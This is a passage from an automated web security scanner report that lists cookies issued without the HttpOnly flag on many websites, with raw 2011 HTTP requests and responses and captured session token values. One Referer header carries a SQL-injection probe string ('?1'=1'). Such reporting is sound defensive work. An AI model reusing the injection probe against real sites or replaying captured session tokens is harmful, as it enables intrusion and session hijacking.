The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=p2kggg0b9m3bnq9c57hhsvlcl0; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=p2kggg0b9m3bnq9c57hhsvlcl0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 33956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

14.150. http://www.netlingo.com/register.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /register.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=sb796kqmjk5b811eau65ljq195; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /register.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=sb796kqmjk5b811eau65ljq195; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 46577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

14.151. http://www.netlingo.com/shop/index.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /shop/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=ubh5bqn9kj4a5lcoor3k51ph52; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shop/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=ubh5bqn9kj4a5lcoor3k51ph52; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

14.152. http://www.netlingo.com/shop/shopping-cart.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /shop/shopping-cart.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=ogucvrimkkhjf3ddi951jdps62; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shop/shopping-cart.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=ogucvrimkkhjf3ddi951jdps62; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 32824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

14.153. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.networkworld.com
Path:   /community/blog/ebay-use-joomla-open-source-glue

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • SESSa27dc0841fd4d8567c009be96a283c67=cl3ko5pm3b3hr81s3vr2lv1nc2; expires=Thu, 17-Feb-2011 08:37:13 GMT; path=/; domain=.networkworld.com
  • Apache=173.193.214.243.1295931833340495; path=/; expires=Thu, 24-Jan-13 05:03:53 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /community/blog/ebay-use-joomla-open-source-glue HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Cneonction: close
Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 05:03:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 05:03:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=173.193.214.243.1295931833340495; path=/; expires=Thu, 24-Jan-13 05:03:53 GMT
Set-Cookie: SESSa27dc0841fd4d8567c009be96a283c67=cl3ko5pm3b3hr81s3vr2lv1nc2; expires=Thu, 17-Feb-2011 08:37:13 GMT; path=/; domain=.networkworld.com
Content-Length: 95231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns = "http://www.w3.org/1999/xhtml" xml:lang = "en" lang = "en">
<head
...[SNIP]...

14.154. http://www.newsguy.com/charity_chart.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.newsguy.com
Path:   /charity_chart.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=07012ad8141231b123a48e02dfed57fc; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /charity_chart.htm HTTP/1.1
Host: www.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 15:15:23 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=07012ad8141231b123a48e02dfed57fc; path=/
Location: /
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 0


14.155. http://www.newsguy.com/home_popupstatus.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.newsguy.com
Path:   /home_popupstatus.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=035b0223f0f25a4fbdfd2af72cd3349f; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home_popupstatus.htm HTTP/1.1
Host: www.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 15:15:23 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=035b0223f0f25a4fbdfd2af72cd3349f; path=/
Location: /
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 0


14.156. http://www.newsguy.com/overview.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.newsguy.com
Path:   /overview.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=0b3bde5ef4c5042fc11d526d2dd84342; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /overview.htm HTTP/1.1
Host: www.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:24 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0b3bde5ef4c5042fc11d526d2dd84342; path=/
Content-Length: 33263
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Newsguy's Account Options</title>
<meta NAME="descript
...[SNIP]...

14.157. http://www.officedepot.com/promo.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.officedepot.com
Path:   /promo.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • JSESSIONID=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic; Path=/
  • jsession_unique_id=1295931847463; Expires=Tue, 25 Jan 2011 06:34:07 GMT; Path=/
  • IBSD_LOCALE=en_US; Expires=Fri, 20 Jan 2012 05:04:07 GMT; Path=/
  • CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
  • CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
  • CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
  • cae_browser=desktop; path=/; domain=.officedepot.com
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /promo.do HTTP/1.1
Host: www.officedepot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml"
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Tue, 25 Jan 2011 05:04:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic; Path=/
Set-Cookie: jsession_unique_id=1295931847463; Expires=Tue, 25 Jan 2011 06:34:07 GMT; Path=/
Set-Cookie: CU_BRAND=OD; Expires=Fri, 20 Jan 2012 05:04:07 GMT; Path=/
Set-Cookie: IBSD_LOCALE=en_US; Expires=Fri, 20 Jan 2012 05:04:07 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com
Content-Length: 73834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html class="nojs" xmlns=
...[SNIP]...

14.158. http://www.opensource.org/licenses/bsd-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/bsd-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=orttk62qs56op2so5ctlcpa9u7; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/bsd-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:43 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=orttk62qs56op2so5ctlcpa9u7; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 25 Jan 2011 00:01:58 GMT
ETag: "7de37e433f136f70754431d33998090d"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

14.159. http://www.opensource.org/licenses/gpl-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=4iogpts99t9ivnkufvcubm4sb4; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:43 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=4iogpts99t9ivnkufvcubm4sb4; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 25 Jan 2011 00:02:12 GMT
ETag: "c78bed29e3c1e7584db2cae96691f4e3"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

14.160. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=cqn9psagddni8r0cu6qcets3f0; expires=Thu, 17-Feb-2011 03:42:02 GMT; path=/; domain=.opensource.org
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:42 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=cqn9psagddni8r0cu6qcets3f0; expires=Thu, 17-Feb-2011 03:42:02 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 25 Jan 2011 00:01:06 GMT
ETag: "ecf056aef437e96f0aaa9888d3f21414"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

14.161. http://www.packtpub.com/award

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.packtpub.com
Path:   /award

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • SESS93d7a233ed897d918b53457b98164e93=fpu3r74605hmvi8pofbnt04583; expires=Tue, 25-Jan-2011 15:15:08 GMT; path=/; domain=.packtpub.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /award HTTP/1.1
Host: www.packtpub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 24 Jan 2011 15:15:08 GMT
Server: Apache
Set-Cookie: SESS93d7a233ed897d918b53457b98164e93=fpu3r74605hmvi8pofbnt04583; expires=Tue, 25-Jan-2011 15:15:08 GMT; path=/; domain=.packtpub.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:15:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Location: http://www.packtpub.com/open-source-awards-home
Vary: Accept-Encoding
Content-Length: 1
Content-Type: text/html; charset=utf-8
Connection: close



14.162. http://www.paperg.com/jsfb/embed.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=1a2a1fi9q2vop26mnuph8otr37; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsfb/embed.php?pid=3922&bid=2123 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:23:53 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 39271


var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123 = 'http://www.
...[SNIP]...

14.163. http://www.parenthood.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.parenthood.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • PHPSESSID=2bb2r6pp17500tshvuo5ak5ap5; path=/
  • BIGipServerwww_parenthood.com_http_pool=457334026.20480.0000; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.parenthood.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:54:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=2bb2r6pp17500tshvuo5ak5ap5; path=/
Vary: Accept-Encoding
Cache-Control: public
Expires: Thu, 15 May 2010 20:00:00 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerwww_parenthood.com_http_pool=457334026.20480.0000; path=/
Content-Length: 106355


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<meta htt
...[SNIP]...

14.164. http://www.roomsaver.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.roomsaver.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=8tjbv0o18kobn9bckebm33vd32; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.roomsaver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 00:09:04 GMT
Server: Apache
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=8tjbv0o18kobn9bckebm33vd32; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" x
...[SNIP]...

14.165. http://www.sea-tec.it/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sea-tec.it
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ASPSESSIONIDCQCBQBBR=FJGEDFLCALFBGHNFMNPFKKON; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.sea-tec.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 144
Content-Type: text/html
Location: it/index.asp
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQCBQBBR=FJGEDFLCALFBGHNFMNPFKKON; path=/
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 02:28:43 GMT
Connection: close

<head><title>Oggetto spostato</title></head>
<body><h1>Oggetto spostato</h1>Questo oggetto . disponibile <a HREF="it/index.asp">qui</a>.</body>

14.166. http://www.senioroutlook.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.senioroutlook.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ASPSESSIONIDQSSBQQRT=HMPBCLOCPPJOAKGIALPFPFPD; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.senioroutlook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 132
Content-Type: text/html
Location: default.asp
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSSBQQRT=HMPBCLOCPPJOAKGIALPFPFPD; path=/
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 00:09:16 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="default.asp">here</a>.</body>

14.167. http://www.squidoo.com/lensmaster/bookmark

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.squidoo.com
Path:   /lensmaster/bookmark

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=6p76tbjmo4sg3qaa5nn32r74t5; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lensmaster/bookmark HTTP/1.1
Host: www.squidoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Set-Cookie: PHPSESSID=6p76tbjmo4sg3qaa5nn32r74t5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.squidoo.com/member/login
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Date: Tue, 25 Jan 2011 04:37:15 GMT
X-Varnish: 1756961506
Age: 0
Via: 1.1 varnish
Connection: close


14.168. http://www.t-mobile.com/Company/Community.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.t-mobile.com
Path:   /Company/Community.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • TMobileSession=WT=&DCS=; domain=.t-mobile.com; path=/
  • TMobileCommon=TeaId=1a4c4817-e07d-4717-85bc-99437711e569; domain=.t-mobile.com; path=/
  • TMobileCommon=TeaId=1a4c4817-e07d-4717-85bc-99437711e569; domain=.t-mobile.com; path=/
  • PartnerExpiration=PARTNER=!2%2f8%2f2011+4%3a38%3a47+AM; domain=.t-mobile.com; expires=Wed, 25-Jan-2012 04:38:47 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Company/Community.aspx?tp=Abt_Tab_HandsetRecycling HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: TMobileCommon=TeaId=1a4c4817-e07d-4717-85bc-99437711e569; domain=.t-mobile.com; path=/
Set-Cookie: ASP.NET_SessionId=chnwja451k35xk453rmski55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: TMobileCommon=TeaId=1a4c4817-e07d-4717-85bc-99437711e569; domain=.t-mobile.com; path=/
Set-Cookie: ASP.NET_SessionId=chnwja451k35xk453rmski55; path=/; HttpOnly
Set-Cookie: PartnerExpiration=PARTNER=!2%2f8%2f2011+4%3a38%3a47+AM; domain=.t-mobile.com; expires=Wed, 25-Jan-2012 04:38:47 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Wed, 25-Jan-2006 04:38:47 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Wed, 25-Jan-2006 04:38:47 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=; domain=.t-mobile.com; path=/
Date: Tue, 25 Jan 2011 04:38:47 GMT
Connection: close
Content-Length: 41256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...

14.169. http://www.thisnext.com/pick/new/submit/sociable/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.thisnext.com
Path:   /pick/new/submit/sociable/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • session=046f9657edcc992948bb669f4e6686bd; path=/
  • browser=173.193.214.243.1295930346514828; path=/; expires=Fri, 22-Jan-21 04:39:06 GMT
